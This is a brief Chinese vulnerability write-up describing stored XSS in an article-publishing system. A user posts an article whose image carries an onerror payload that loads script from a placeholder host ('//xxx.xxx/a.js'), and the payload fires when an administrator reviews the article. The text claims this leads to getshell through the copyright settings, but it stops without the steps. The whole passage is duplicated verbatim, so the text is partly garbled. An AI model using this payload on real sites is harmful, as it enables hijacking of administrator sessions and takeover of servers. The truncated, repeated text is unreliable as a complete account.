漏洞细节
注册一个用户,在发表文章的地方发表文章
在编辑器里加入一张图片
用firebug修改图片地址 加入onerror属性
οnerrοr=document.body.appendChild(document.createElement('script')).src='//xxx.xxx/a.js'
因为发表的文章需要后台管理员审核的,当管理员审核的时候触发漏洞
然后是getshell
有了后台xss都好办
在修改版权处
保存以后
注册一个用户,在发表文章的地方发表文章
在编辑器里加入一张图片
用firebug修改图片地址 加入onerror属性
οnerrοr=document.body.appendChild(document.createElement('script')).src='//xxx.xxx/a.js'
因为发表的文章需要后台管理员审核的,当管理员审核的时候触发漏洞
然后是getshell
有了后台xss都好办
在修改版权处
保存以后